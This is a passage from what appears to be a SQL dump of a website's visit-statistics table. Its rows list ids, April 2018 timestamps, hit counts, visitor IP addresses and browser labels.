,1,0,'66.249.66.195',''),(233757,1523871569,1,1,0,0,'216.244.66.237','other'),(233758,1523872322,1,1,0,0,'91.196.178.129','firefox'),(233759,1523873311,1,1,0,0,'128.74.245.119','chrome'),(233760,1523873457,1,1,0,0,'178.154.200.7','other'),(233761,1523874015,1,1,0,0,'178.154.171.88','other'),(233762,1523874184,1,1,0,0,'8.29.198.26','other'),(233763,1523874203,1,1,0,0,'91.227.182.51','chrome'),(233764,1523874254,1,1,0,0,'94.179.7.35','chrome'),(233765,1523874326,1,1,0,0,'207.244.149.74','chrome'),(233766,1523874855,1,1,0,0,'37.53.129.178','chrome'),(233767,1523874943,1,1,0,0,'216.244.66.237','other'),(233768,1523875177,2,2,0,0,'130.180.217.204','chrome'),(233769,1523875549,1,1,0,0,'37.9.113.101','other'),(233770,1523875714,3,3,0,0,'5.9.147.133','other'),(233771,1523875742,1,1,0,0,'217.69.133.69','other'),(233772,1523876118,2,2,0,0,'216.244.66.237','other'),(233773,1523876597,1,1,0,0,'46.211.112.190','chrome'),(233774,1523877453,1,1,0,0,'91.196.177.46','firefox'),(233775,1523877796,2,2,0,0,'130.180.216.46','chrome'),(233776,1523878005,1,1,0,0,'91.196.178.90','chrome'),(233777,1523878116,2,2,0,0,'216.244.66.237','other'),(233778,1523878273,2,2,0,0,'141.8.142.74','other'),(233779,1523878922,1,1,0,0,'217.69.133.223','other'),(233780,1523879262,1,1,0,0,'141.8.142.74','other'),(233781,1523879334,1,1,0,0,'91.196.177.46','firefox'),(233782,1523879607,2,2,0,0,'216.244.66.237','other'),(233783,1523879708,1,1,0,0,'91.196.178.14','chrome'),(233784,1523879904,1,1,0,0,'37.144.56.69','msie'),(233785,1523880681,1,1,0,0,'178.154.171.88','other'),(233786,1523880924,1,1,0,0,'141.8.142.74','other'),(233787,1523881597,1,1,0,0,'37.115.180.234','firefox'),(233788,1523881603,1,1,0,0,'91.196.177.46','chrome'),(233789,1523882114,1,1,0,0,'37.54.163.181','chrome'),(233790,1523882319,1,1,0,0,'46.161.9.30','firefox'),(233791,1523882616,1,1,0,0,'91.196.178.93','firefox'),(233792,1523884090,2,2,0,0,'216.244.66.237','other'),(233793,1523885030,1,1,0,0,'8.29.198.27','other'),(233794,1523885754,1,1,0,0,'207.46.13.31','other'),(233795,1523886415,1,1,0,0,'91.196.178.14','chrome'),(233796,1523886565,1,1,0,0,'37.9.113.138','other'),(233797,1523886686,1,1,0,0,'216.244.66.237','other'),(233798,1523887267,3,3,0,0,'148.251.22.254','other'),(233799,1523887324,1,1,0,0,'180.76.15.157','other'),(233800,1523887339,2,2,0,0,'54.165.59.7','other'),(233801,1523888174,1,1,0,0,'83.142.233.169','chrome'),(233802,1523888747,1,1,0,0,'216.244.66.237','other'),(233803,1523888857,2,2,0,0,'54.165.59.7','other'),(233804,1523889048,2,2,0,0,'91.196.178.161','chrome'),(233805,1523889123,2,2,0,0,'91.196.177.46','chrome'),(233806,1523889332,1,1,0,0,'217.69.133.11','other'),(233807,1523889610,1,1,0,0,'180.76.15.154','other'),(233808,1523889761,1,1,0,0,'141.8.142.74','other'),(233809,1523889864,1,1,0,0,'91.209.11.236','other'),(233810,1523889950,1,1,0,0,'207.46.13.31','other'),(233811,1523890267,1,1,0,0,'212.26.144.114','firefox'),(233812,1523891848,1,1,0,0,'216.244.66.237','other'),(233813,1523892227,1,1,0,0,'193.106.30.99','firefox'),(233814,1523892866,1,1,0,0,'216.244.66.237','other'),(233815,1523893980,1,1,0,0,'35.226.23.240','other'),(233816,1523894082,1,1,0,0,'217.69.133.230','other'),(233817,1523894342,1,0,1,0,'66.249.66.199',''),(233818,1523894578,2,2,0,0,'37.54.22.192','chrome'),(233819,1523895489,1,1,0,0,'91.196.178.99','chrome'),(233820,1523895862,1,1,0,0,'8.29.198.27','other'),(233821,1523895884,2,2,0,0,'178.154.171.88','other'),(233822,1523895913,1,1,0,0,'178.74.213.133','firefox'),(233823,1523897020,1,1,0,0,'89.102.51.57','chrome'),(233824,1523897054,1,1,0,0,'158.69.252.151','other'),(233825,1523897408,1,1,0,0,'91.196.178.93','firefox'),(233826,1523897929,2,2,0,0,'216.244.66.237','other'),(233827,1523898240,1,1,0,0,'141.8.142.74','other'),(233828,1523898380,1,1,0,0,'91.196.178.33','chrome'),(233829,1523898463,1,1,0,0,'54.196.123.46','other'),(233830,1523899141,5,5,0,0,'216.244.66.237','other'),(233831,1523899520,1,1,0,0,'217.69.133.13','other'),(233832,1523900070,4,4,0,0,'216.244.66.237','other'),(233833,1523900267,1,1,0,0,'35.226.23.240','other'),(233834,1523900476,1,1,0,0,'141.8.142.74','other'),(233835,1523900572,1,0,1,0,'66.249.66.195',''),(233836,1523901677,1,1,0,0,'217.69.133.249','other'),(233837,1523902713,1,1,0,0,'185.29.255.71','chrome'),(233838,1523902750,1,1,0,0,'141.8.142.74','other'),(233839,1523903520,1,1,0,0,'216.244.66.237','other'),(233840,1523904402,2,1,1,0,'66.249.66.157',''),(233841,1523906377,1,1,0,0,'46.161.9.30','chrome'),(233842,1523906629,1,1,0,0,'95.132.0.155','chrome'),(233843,1523906667,1,0,1,0,'66.249.66.199',''),(233844,1523906698,1,1,0,0,'8.29.198.26','other'),(233845,1523906923,1,1,0,0,'91.196.178.102','other'),(233846,1523908245,1,1,0,0,'216.244.66.237','other'),(233847,1523908420,1,0,1,0,'66.249.66.201',''),(233848,1523908609,1,1,0,0,'178.154.171.88','other'),(233849,1523908718,2,2,0,0,'91.196.178.26','chrome'),(233850,1523909656,1,1,0,0,'216.244.66.237','other'),(233851,1523909782,1,1,0,0,'217.69.133.11','other'),(233852,1523910409,2,2,0,0,'141.8.142.74','other'),(233853,1523910572,1,1,0,0,'217.69.133.219','other'),(233854,1523910606,1,1,0,0,'35.226.23.240','other'),(233855,1523911111,1,1,0,0,'216.244.66.237','other'),(233856,1523911280,1,1,0,0,'77.111.244.24','chrome'),(233857,1523911710,1,0,1,0,'66.249.66.199',''),(233858,1523912569,1,1,0,0,'216.244.66.237','other'),(233859,1523912657,1,1,0,0,'157.55.39.102','other'),(233860,1523912763,1,1,0,0,'217.69.133.70','other'),(233861,1523913158,2,2,0,0,'35.226.23.240','other'),(233862,1523913421,1,1,0,0,'193.106.30.99','firefox'),(233863,1523914929,1,1,0,0,'91.209.11.236','other'),(233864,1523915288,1,0,1,0,'66.249.66.195',''),(233865,1523917130,3,3,0,0,'216.244.66.237','other'),(233866,1523917298,74,74,0,0,'77.74.28.7','other'),(233867,1523917535,1,1,0,0,'8.29.198.25','other'),(233868,1523917578,1,1,0,0,'35.226.23.240','other'),(233869,1523917832,16,16,0,0,'23.237.4.26','other'),(233870,1523919331,1,1,0,0,'141.8.142.74','other'),(233871,1523920117,1,1,0,0,'117.64.49.99','msie'),(233872,1523920257,2,2,0,0,'216.244.66.237','other'),(233873,1523920619,1,1,0,0,'217.69.133.14','other'),(233874,1523921338,3,3,0,0,'141.8.142.74','other'),(233875,1523921598,1,1,0,0,'157.55.39.102','other'),(233876,1523922334,1,1,0,0,'178.154.171.88','other'),(233877,1523922993,1,1,0,0,'141.8.142.74','other'),(233878,1523923809,1,0,1,0,'66.249.66.199',''),(233879,1523923940,1,1,0,0,'141.8.142.74','other'),(233880,1523924243,2,2,0,0,'216.244.66.237','other'),(233881,1523924283,1,1,0,0,'217.69.133.240','other'),(233882,1523925504,1,1,0,0,'139.59.227.147','other'),(233883,1523925858,1,1,0,0,'217.69.133.247','other'),(233884,1523925860,1,1,0,0,'217.69.133.245','other'),(233885,1523925877,1,1,0,0,'46.161.9.30','firefox'),(233886,1523925912,2,2,0,0,'141.8.142.74','other'),(233887,1523925946,1,1,0,0,'217.69.133.3','other'),(233888,1523926049,1,1,0,0,'217.69.136.205','other'),(233889,1523926162,2,2,0,0,'216.244.66.237','other'),(233890,1523928370,1,1,0,0,'8.29.198.27','other'),(233891,1523929573,1,1,0,0,'35.226.23.240','other'),(233892,1523930851,1,1,0,0,'141.8.142.74','other'),(233893,1523931588,1,0,1,0,'66.249.66.195',''),(233894,1523931783,2,2,0,0,'141.8.142.74','other'),(233895,1523932361,1,1,0,0,'216.244.66.237','other'),(233896,1523932518,1,0,1,0,'66.249.66.199',''),(233897,1523933053,1,1,0,0,'66.249.66.199','chrome'),(233898,1523933191,2,2,0,0,'95.213.141.126','opera'),(233899,1523933628,3,3,0,0,'141.8.142.74','other'),(233900,1523936133,1,1,0,0,'207.46.13.139','other'),(233901,1523936367,1,0,1,0,'66.249.66.195',''),(233902,1523938160,1,1,0,0,'216.244.66.237','other'),(233903,1523939195,1,1,0,0,'8.29.198.27','other'),(233904,1523939749,1,1,0,0,'216.244.66.237','other'),(233905,1523940373,1,1,0,0,'185.29.254.6','firefox'),(233906,1523941102,2,2,0,0,'216.244.66.237','other'),(233907,1523941457,1,1,0,0,'180.76.15.156','other'),(233908,1523941571,1,1,0,0,'178.154.171.88','other'),(233909,1523941698,2,2,0,0,'91.196.178.169','chrome'),(233910,1523941825,1,0,1,0,'66.249.66.201',''),(233911,1523942142,2,2,0,0,'216.244.66.237','other'),(233912,1523942258,1,0,1,0,'66.249.66.199',''),(233913,1523943060,1,1,0,0,'37.54.75.195','chrome'),(233914,1523943185,1,1,0,0,'178.154.171.88','other'),(233915,1523943191,1,1,0,0,'141.8.142.74','other'),(233916,1523943209,2,2,0,0,'37.9.113.182','other'),(233917,1523943347,1,0,1,0,'66.249.66.158',''),(233918,1523943462,1,1,0,0,'178.62.85.75','chrome'),(233919,1523943614,1,1,0,0,'216.244.66.237','other'),(233920,1523944036,1,1,0,0,'87.250.224.46','other'),(233921,1523944512,1,1,0,0,'66.249.66.156','chrome'),(233922,1523944762,2,2,0,0,'82.207.121.233','chrome'),(233923,1523944777,2,2,0,0,'91.196.178.83','chrome'),(233924,1523945368,1,1,0,0,'178.154.200.41','other'),(233925,1523945390,1,1,0,0,'193.106.30.99','firefox'),(233926,1523945751,1,1,0,0,'178.159.37.11','chrome'),(233927,1523946006,796,796,0,0,'185.6.8.9','other'),(233928,1523946174,2,2,0,0,'178.154.171.88','other'),(233929,1523946641,1,1,0,0,'87.250.224.46','other'),(233930,1523946869,1,1,0,0,'180.76.15.11','other'),(233931,1523947033,1,1,0,0,'216.244.66.237','other'),(233932,1523947158,2,2,0,0,'91.196.178.97','chrome'),(233933,1523947585,1,1,0,0,'188.230.43.254','other'),(233934,1523947704,1,1,0,0,'92.112.59.226','chrome'),(233935,1523947728,1,0,1,0,'66.249.66.199',''),(233936,1523948362,1,1,0,0,'107.21.1.8','other'),(233937,1523948706,1,1,0,0,'216.244.66.237','other'),(233938,1523949931,1,1,0,0,'46.161.9.30','firefox'),(233939,1523950043,1,1,0,0,'8.29.198.26','other'),(233940,1523950079,1,1,0,0,'216.244.66.237','other'),(233941,1523950126,1,1,0,0,'35.226.23.240','other'),(233942,1523950209,1,1,0,0,'95.135.32.53','chrome'),(233943,1523951011,1,1,0,0,'216.244.66.237','other'),(233944,1523951271,1,1,0,0,'35.226.23.240','other'),(233945,1523951530,2,2,0,0,'141.8.142.74','other'),(233946,1523952008,2,2,0,0,'78.111.190.36','chrome'),(233947,1523952085,1,1,0,0,'37.9.113.110','other'),(233948,1523952708,1,1,0,0,'188.190.238.238','chrome'),(233949,1523952756,1,1,0,0,'37.9.113.134','other'),(233950,1523952907,2,2,0,0,'91.196.178.86','chrome'),(233951,1523954105,1,1,0,0,'62.205.134.182','msie'),(233952,1523954635,1,1,0,0,'94.45.145.8','chrome'),(233953,1523954695,1,1,0,0,'37.9.113.80','other'),(233954,1523954914,2,2,0,0,'51.15.70.23','other'),(233955,1523955457,1,1,0,0,'87.250.224.125','other'),(233956,1523955728,1,1,0,0,'207.46.13.16','other'),(233957,1523956996,1,1,0,0,'54.81.117.119','other'),(233958,1523958120,1,1,0,0,'193.106.30.99','firefox'),(233959,1523958424,1,1,0,0,'46.161.9.30','chrome'),(233960,1523959033,1,1,0,0,'62.205.134.182','msie'),(233961,1523959052,1,1,0,0,'37.9.113.182','other'),(233962,1523959400,1,1,0,0,'93.188.39.163','firefox'),(233963,1523959497,1,1,0,0,'93.178.215.22','chrome'),(233964,1523959718,1,1,0,0,'180.76.15.135','other'),(233965,1523960875,1,1,0,0,'8.29.198.26','other'),(233966,1523961503,1,1,0,0,'54.81.117.119','other'),(233967,1523961726,1,1,0,0,'35.226.23.240','other'),(233968,1523962011,2,2,0,0,'216.244.66.237','other'),(233969,1523962666,1,1,0,0,'37.54.17.195','chrome'),(233970,1523962816,1,1,0,0,'178.154.171.88','other'),(233971,1523963045,1,1,0,0,'193.8.46.59','chrome'),(233972,1523963215,2,2,0,0,'216.244.66.237','other'),(233973,1523963790,1,1,0,0,'178.154.171.10','other'),(233974,1523963792,1,1,0,0,'213.180.203.7','other'),(233975,1523964566,1,1,0,0,'40.77.167.73','other'),(233976,1523964922,1,1,0,0,'87.250.224.46','other'),(233977,1523965061,1,1,0,0,'91.196.178.99','firefox'),(233978,1523965261,1,1,0,0,'195.211.62.171','firefox'),(233979,1523965286,2,2,0,0,'141.8.142.74','other'),(233980,1523965771,1,1,0,0,'46.161.9.30','firefox'),(233981,1523966237,1,1,0,0,'95.132.15.61','firefox'),(233982,1523966369,2,2,0,0,'178.154.171.88','other'),(233983,1523966490,1,1,0,0,'37.52.191.163','chrome'),(233984,1523966723,1,1,0,0,'77.111.244.67','chrome'),(233985,1523966818,2,2,0,0,'91.196.178.83','chrome'),(233986,1523966872,1,1,0,0,'91.196.178.94','firefox'),(233987,1523967344,2,2,0,0,'141.8.142.74','other'),(233988,1523967357,1,1,0,0,'217.69.133.190','other'),(233989,1523967665,1,1,0,0,'94.125.126.133','firefox'),(233990,1523967730,2,2,0,0,'216.244.66.237','other'),(233991,1523968174,1,1,0,0,'178.93.15.152','firefox'),(233992,1523968353,2,2,0,0,'91.196.177.15','chrome'),(233993,1523968446,1,1,0,0,'130.180.220.196','chrome'),(233994,1523968761,1,1,0,0,'37.52.191.163','chrome'),(233995,1523968827,1,1,0,0,'141.8.142.74','other'),(233996,1523968897,1,1,0,0,'54.81.117.119','other'),(233997,1523969156,4,4,0,0,'195.10.210.70','chrome'),(233998,1523969277,1,1,0,0,'178.154.200.41','other'),(233999,1523969292,1,1,0,0,'216.244.66.237','other'),(234000,1523969558,1,1,0,0,'178.154.171.88','other'),(234001,1523969875,1,1,0,0,'94.179.151.110','chrome'),(234002,1523970233,2,2,0,0,'141.8.142.74','other'),(234003,1523970287,2,2,0,0,'87.250.224.46','other'),(234004,1523970634,1,1,0,0,'95.134.103.100','chrome'),(234005,1523970684,1,1,0,0,'37.9.113.182','other'),(234006,1523970726,1,1,0,0,'178.154.200.41','other'),(234007,1523971037,1,1,0,0,'216.244.66.237','other'),(234008,1523971538,1,1,0,0,'178.154.171.88','other'),(234009,1523971705,1,1,0,0,'8.29.198.27','other'),(234010,1523971721,1,1,0,0,'157.55.39.139','other'),(234011,1523972121,3,3,0,0,'91.196.178.166','chrome'),(234012,1523972198,1,1,0,0,'37.55.236.81','chrome'),(234013,1523972392,1,1,0,0,'31.43.31.169','chrome'),(234014,1523973325,2,2,0,0,'141.8.142.74','other'),(234015,1523973344,1,1,0,0,'40.77.167.73','other'),(234016,1523973863,1,1,0,0,'82.207.120.140','chrome'),(234017,1523974306,3,3,0,0,'87.250.224.46','other'),(234018,1523974908,2,2,0,0,'141.8.142.74','other'),(234019,1523975233,1,1,0,0,'217.69.133.59','other'),(234020,1523975640,1,1,0,0,'178.154.171.88','other'),(234021,1523975877,1,1,0,0,'141.8.142.74','other'),(234022,1523978244,1,1,0,0,'109.162.105.91','chrome'),(234023,1523978636,1,1,0,0,'37.53.136.32','chrome'),(234024,1523978822,2,2,0,0,'162.210.196.100','other'),(234025,1523980680,1,1,0,0,'178.154.171.88','other'),(234026,1523981815,1,1,0,0,'206.189.124.174','other'),(234027,1523982439,22,22,0,0,'158.69.252.151','other'),(234028,1523982510,1,1,0,0,'91.196.178.88','firefox'),(234029,1523982538,1,1,0,0,'8.29.198.26','other'),(234030,1523983143,1,1,0,0,'87.250.224.46','other'),(234031,1523983285,2,2,0,0,'216.244.66.237','other'),(234032,1523983373,1,1,0,0,'46.161.9.30','chrome'),(234033,1523984509,1,1,0,0,'180.76.15.18','other'),(234034,1523986619,1,1,0,0,'178.154.171.88','other'),(234035,1523986661,1,1,0,0,'216.244.66.237','other'),(234036,1523986973,1,1,0,0,'217.69.133.221','other'),(234037,1523987661,2,2,0,0,'91.196.178.68','chrome'),(234038,1523987738,2,2,0,0,'91.196.178.166','chrome'),(234039,1523987985,1,1,0,0,'157.55.39.122','other'),(234040,1523989204,1,1,0,0,'141.8.142.74','other'),(234041,1523989416,1,1,0,0,'217.69.133.248','other'),(234042,1523989443,28,28,0,0,'37.57.218.243','other'),(234043,1523989795,1,1,0,0,'92.112.226.147','chrome'),(234044,1523990287,38,38,0,0,'192.99.69.242','other'),(234045,1523992018,1,1,0,0,'35.226.23.240','other'),(234046,1523992057,1,1,0,0,'141.8.142.74','other'),(234047,1523992074,2,2,0,0,'91.196.178.7','chrome'),(234048,1523992504,2,2,0,0,'46.200.113.161','chrome'),(234049,1523992729,1,1,0,0,'216.244.66.237','other'),(234050,1523993291,1,1,0,0,'217.69.133.192','other'),(234051,1523993333,1,1,0,0,'167.99.202.158','other'),(234052,1523993373,1,1,0,0,'8.29.198.25','other'),(234053,1523994248,1,1,0,0,'35.226.23.240','other'),(234054,1523995049,2,2,0,0,'178.154.171.88','other'),(234055,1523995257,1,1,0,0,'37.145.10.63','other'),(234056,1523995393,1,1,0,0,'54.80.23.241','other'),(234057,1523996604,2,2,0,0,'178.154.171.88','other'),(234058,1523996696,1,1,0,0,'141.8.142.74','other'),(234059,1523998411,1,1,0,0,'35.226.23.240','other'),(234060,1523999080,1,1,0,0,'138.68.67.55','other'),(234061,1523999289,2,2,0,0,'148.251.52.198','other'),(234062,1523999628,1,1,0,0,'87.250.224.46','other'),(234063,1524000312,1,1,0,0,'141.8.142.74','other'),(234064,1524000372,1,1,0,0,'178.154.171.88','other'),(234065,1524000771,1,1,0,0,'217.69.133.243','other'),(234066,1524000979,1,1,0,0,'217.69.133.69','other'),(234067,1524001273,1,1,0,0,'141.8.142.74','other'),(234068,1524001365,1,1,0,0,'141.8.132.19','other'),(234069,1524002097,1,1,0,0,'193.106.30.99','firefox'),(234070,1524002126,1,1,0,0,'217.69.133.249','other'),(234071,1524002744,1,1,0,0,'217.69.133.23','other'),(234072,1524002999,1,1,0,0,'217.69.136.204','other'),(234073,1524003252,1,1,0,0,'141.8.142.74','other'),(234074,1524003297,1,1,0,0,'35.226.23.240','other'),(234075,1524003393,2,2,0,0,'216.244.66.237','other'),(234076,1524003582,1,1,0,0,'217.69.133.31','other'),(234077,1524003664,1,0,1,0,'66.249.66.201',''),(234078,1524003852,1,0,1,0,'66.249.66.199',''),(234079,1524004200,1,1,0,0,'8.29.198.27','other'),(234080,1524005005,2,2,0,0,'35.226.23.240','other'),(234081,1524005404,2,2,0,0,'217.69.133.10','other'),(234082,1524005880,1,1,0,0,'178.154.171.88','other'),(234083,1524006222,1,1,0,0,'216.244.66.237','other'),(234084,1524006474,2,2,0,0,'136.243.68.226','other'),(234085,1524007159,1,1,0,0,'216.244.66.237','other'),(234086,1524008635,1,1,0,0,'141.8.142.74','other'),(234087,1524008830,1,1,0,0,'216.244.66.237','other'),(234088,1524009646,1,1,0,0,'178.154.171.88','other'),(234089,1524009827,1,1,0,0,'46.161.9.30','firefox'),(234090,1524009908,1,1,0,0,'95.24.5.218','chrome'),(234091,1524010449,1,1,0,0,'207.46.13.215','other'),(234092,1524010900,1,0,1,0,'66.249.66.199',''),(234093,1524010955,1,1,0,0,'66.249.66.195','chrome'),(234094,1524014789,1,1,0,0,'216.244.66.237','other'),(234095,1524014816,1,1,0,0,'217.69.133.30','other'),(234096,1524015035,1,1,0,0,'8.29.198.26','other'),(234097,1524015620,1,1,0,0,'217.69.133.14','other'),(234098,1524016151,1,1,0,0,'207.46.13.31','other'),(234099,1524016603,1,1,0,0,'216.244.66.237','other'),(234100,1524016671,1,1,0,0,'188.230.43.254','other'),(234101,1524017439,1,1,0,0,'35.226.23.240','other'),(234102,1524019071,1,1,0,0,'188.230.43.254','other'),(234103,1524019843,2,2,0,0,'173.212.202.220','other'),(234104,1524020502,1,1,0,0,'217.69.133.220','other'),(234105,1524020678,2,2,0,0,'141.8.142.74','other'),(234106,1524020971,1,0,1,0,'66.249.66.156',''),(234107,1524021471,1,1,0,0,'188.230.43.254','other'),(234108,1524021487,1,1,0,0,'37.9.113.182','other'),(234109,1524024024,1,1,0,0,'216.244.66.237','other'),(234110,1524024513,1,1,0,0,'54.165.59.7','other'),(234111,1524025860,1,1,0,0,'8.29.198.26','other'),(234112,1524026008,1,1,0,0,'180.76.15.17','other'),(234113,1524026877,3,3,0,0,'141.8.142.74','other'),(234114,1524027222,1,1,0,0,'216.244.66.237','other'),(234115,1524027775,1,1,0,0,'157.55.39.123','other'),(234116,1524028073,1,1,0,0,'207.46.13.24','other'),(234117,1524028106,1,1,0,0,'91.196.178.166','chrome'),(234118,1524029367,1,1,0,0,'91.196.178.166','chrome'),(234119,1524029783,2,2,0,0,'91.196.178.83','chrome'),(234120,1524029854,1,1,0,0,'141.8.142.74','other'),(234121,1524030316,1,1,0,0,'91.196.178.166','chrome'),(234122,1524030748,2,2,0,0,'91.196.178.94','chrome'),(234123,1524031496,1,1,0,0,'91.196.178.166','chrome'),(234124,1524031513,1,1,0,0,'37.54.75.195','chrome'),(234125,1524031532,1,1,0,0,'95.135.21.133','chrome'),(234126,1524031670,1,1,0,0,'37.55.56.67','chrome'),(234127,1524031756,1,1,0,0,'141.8.142.74','other'),(234128,1524031961,1,1,0,0,'217.69.133.23','other'),(234129,1524032126,1,1,0,0,'91.124.182.170','firefox'),(234130,1524032503,2,2,0,0,'91.196.178.169','chrome'),(234131,1524032947,1,1,0,0,'54.165.59.7','other'),(234132,1524033342,6,6,0,0,'91.196.178.83','chrome'),(234133,1524033447,1,1,0,0,'94.179.11.204','firefox'),(234134,1524034002,2,2,0,0,'91.196.177.15','chrome'),(234135,1524034147,1,1,0,0,'54.208.102.37','other'),(234136,1524034282,1,1,0,0,'207.46.13.80','other'),(234137,1524034304,1,1,0,0,'91.124.182.170','firefox'),(234138,1524034306,7,7,0,0,'91.196.178.83','chrome'),(234139,1524034805,1,1,0,0,'178.154.171.88','other'),(234140,1524034901,2,2,0,0,'91.196.178.80','firefox'),(234141,1524035058,2,2,0,0,'91.196.177.46','chrome'),(234142,1524035223,1,1,0,0,'91.124.182.170','firefox'),(234143,1524035297,1,1,0,0,'217.69.136.210','other'),(234144,1524035499,1,1,0,0,'91.196.178.80','chrome'),(234145,1524035523,49,49,0,0,'5.9.106.230','other'),(234146,1524035742,1,1,0,0,'87.250.224.46','other'),(234147,1524035771,5,5,0,0,'91.196.178.83','chrome'),(234148,1524035833,1,1,0,0,'207.46.13.24','other'),(234149,1524035864,1,1,0,0,'91.196.178.80','firefox'),(234150,1524035866,1,1,0,0,'46.200.119.112','firefox'),(234151,1524036032,1,1,0,0,'193.106.30.99','firefox'),(234152,1524036128,1,1,0,0,'91.124.182.170','firefox'),(234153,1524036705,1,1,0,0,'8.29.198.27','other'),(234154,1524036997,1,1,0,0,'216.244.66.237','other'),(234155,1524037329,1,1,0,0,'91.124.182.170','firefox'),(234156,1524037334,2,2,0,0,'91.196.178.83','chrome'),(234157,1524037607,1,1,0,0,'92.112.125.243','chrome'),(234158,1524037911,1,1,0,0,'180.76.15.9','other'),(234159,1524038267,1,1,0,0,'35.226.23.240','other'),(234160,1524038371,1,1,0,0,'87.250.224.46','other'),(234161,1524038389,1,1,0,0,'217.69.133.192','other'),(234162,1524038486,1,1,0,0,'91.196.178.169','chrome'),(234163,1524038830,1,1,0,0,'54.165.59.7','other'),(234164,1524039844,1,1,0,0,'176.111.46.87','chrome'),(234165,1524040369,1,1,0,0,'217.69.136.207','other'),(234166,1524040441,1,1,0,0,'87.250.224.46','other'),(234167,1524041430,1,1,0,0,'207.46.13.91','other'),(234168,1524041435,1,1,0,0,'91.196.178.129','firefox'),(234169,1524041607,1,1,0,0,'216.244.66.237','other'),(234170,1524041898,2,2,0,0,'78.111.190.25','chrome'),(234171,1524042088,2,2,0,0,'178.62.238.64','chrome'),(234172,1524042767,1,1,0,0,'91.124.182.170','firefox'),(234173,1524042892,1,1,0,0,'216.244.66.237','other'),(234174,1524043432,2,2,0,0,'91.196.178.83','chrome'),(234175,1524043716,1,1,0,0,'54.165.59.7','other'),(234176,1524043835,1,1,0,0,'216.244.66.237','other'),(234177,1524044933,1,1,0,0,'91.196.177.46','chrome'),(234178,1524045319,2,0,2,0,'66.249.66.201',''),(234179,1524045341,1,0,1,0,'66.249.66.195',''),(234180,1524045721,1,1,0,0,'217.69.133.11','other'),(234181,1524046174,1,1,0,0,'141.8.142.74','other'),(234182,1524046520,1,1,0,0,'87.250.224.46','other'),(234183,1524047006,1,0,1,0,'66.249.66.199',''),(234184,1524047360,1,1,0,0,'157.55.39.251','other'),(234185,1524047536,1,1,0,0,'8.29.198.27','other'),(234186,1524047559,2,2,0,0,'141.8.142.74','other'),(234187,1524048101,1,1,0,0,'91.196.178.80','firefox'),(234188,1524048722,2,2,0,0,'91.201.226.115','chrome'),(234189,1524049777,1,1,0,0,'207.244.149.74','chrome'),(234190,1524050642,1,1,0,0,'163.172.4.153','firefox'),(234191,1524050663,1,1,0,0,'178.154.171.88','other'),(234192,1524051044,1,1,0,0,'141.8.142.74','other'),(234193,1524051056,1,1,0,0,'87.250.224.46','other'),(234194,1524051972,1,1,0,0,'178.154.171.88','other'),(234195,1524052219,1,1,0,0,'91.196.178.14','chrome'),(234196,1524052432,3,3,0,0,'141.8.142.74','other'),(234197,1524052506,1,1,0,0,'46.188.107.53','msie'),(234198,1524052881,2,2,0,0,'91.196.178.83','chrome'),(234199,1524053734,2,2,0,0,'178.92.139.131','chrome'),(234200,1524053892,3,3,0,0,'35.226.23.240','other'),(234201,1524054114,1,1,0,0,'207.244.149.106','chrome'),(234202,1524054532,1,1,0,0,'91.124.182.170','firefox'),(234203,1524055017,1,1,0,0,'35.226.23.240','other'),(234204,1524056297,1,1,0,0,'216.244.66.237','other'),(234205,1524057123,1,1,0,0,'141.8.142.74','other'),(234206,1524057278,1,1,0,0,'178.154.171.88','other'),(234207,1524057412,1,1,0,0,'66.249.66.199','chrome'),(234208,1524057780,1,1,0,0,'216.244.66.237','other'),(234209,1524057955,4,4,0,0,'91.196.178.74','chrome'),(234210,1524058379,1,1,0,0,'8.29.198.27','other'),(234211,1524058505,1,1,0,0,'178.154.171.88','other'),(234212,1524058507,1,1,0,0,'87.250.224.46','other'),(234213,1524058715,1,1,0,0,'216.244.66.237','other'),(234214,1524059535,1,1,0,0,'91.124.182.170','firefox'),(234215,1524059998,1,1,0,0,'91.196.178.75','firefox'),(234216,1524060404,1,1,0,0,'216.244.66.237','other'),(234217,1524060892,1,1,0,0,'157.55.39.251','other'),(234218,1524061196,1,0,1,0,'66.249.66.201',''),(234219,1524061249,2,2,0,0,'208.83.1.168','chrome'),(234220,1524061252,39,39,0,0,'208.83.1.168','other'),(234221,1524061602,1,1,0,0,'95.132.21.144','firefox'),(234222,1524061604,1,1,0,0,'188.230.43.254','other'),(234223,1524061877,2,2,0,0,'178.154.171.88','other'),(234224,1524063402,2,2,0,0,'91.196.178.163','chrome'),(234225,1524064021,1,1,0,0,'188.230.43.254','other'),(234226,1524064280,1,1,0,0,'178.154.171.88','other'),(234227,1524064315,1,1,0,0,'91.196.178.82','firefox'),(234228,1524064406,1,1,0,0,'217.69.136.210','other'),(234229,1524065925,2,2,0,0,'141.8.142.74','other'),(234230,1524066352,1,1,0,0,'178.154.171.88','other'),(234231,1524066433,1,1,0,0,'188.230.43.254','other'),(234232,1524066634,1,1,0,0,'108.59.8.70','other'),(234233,1524066799,1,1,0,0,'91.196.178.98','firefox'),(234234,1524067277,1,1,0,0,'37.9.113.182','other'),(234235,1524067553,1,1,0,0,'107.167.105.17','other'),(234236,1524067625,1,1,0,0,'107.167.105.17','chrome'),(234237,1524067627,1,1,0,0,'107.167.105.17','opera'),(234238,1524067639,1,1,0,0,'141.8.142.74','other'),(234239,1524067762,1,1,0,0,'216.244.66.237','other'),(234240,1524068122,1,1,0,0,'188.163.37.54','firefox'),(234241,1524068263,1,1,0,0,'87.250.224.46','other'),(234242,1524068265,1,1,0,0,'141.8.132.19','other'),(234243,1524068268,1,1,0,0,'178.154.171.88','other'),(234244,1524068799,1,1,0,0,'188.230.43.254','other'),(234245,1524069227,1,1,0,0,'8.29.198.27','other'),(234246,1524069971,1,1,0,0,'207.46.13.91','other'),(234247,1524070153,1,1,0,0,'35.189.37.151','firefox'),(234248,1524070304,1,0,1,0,'66.249.66.199',''),(234249,1524071063,2,2,0,0,'91.196.178.2','chrome'),(234250,1524071198,1,1,0,0,'188.230.43.254','other'),(234251,1524072732,1,1,0,0,'37.9.113.182','other'),(234252,1524072822,1,1,0,0,'91.209.11.236','other'),(234253,1524073599,1,1,0,0,'188.230.43.254','other'),(234254,1524074043,1,1,0,0,'178.154.171.88','other'),(234255,1524074256,1,1,0,0,'91.196.178.82','firefox'),(234256,1524074260,2,2,0,0,'141.8.142.74','other'),(234257,1524076032,1,1,0,0,'180.76.15.157','other'),(234258,1524076036,1,1,0,0,'157.55.39.251','other'),(234259,1524076360,1,1,0,0,'207.46.13.237','other'),(234260,1524076863,1,1,0,0,'46.161.9.30','chrome'),(234261,1524076891,1,1,0,0,'46.161.9.30','firefox'),(234262,1524076944,1,1,0,0,'178.154.171.88','other'),(234263,1524078219,2,2,0,0,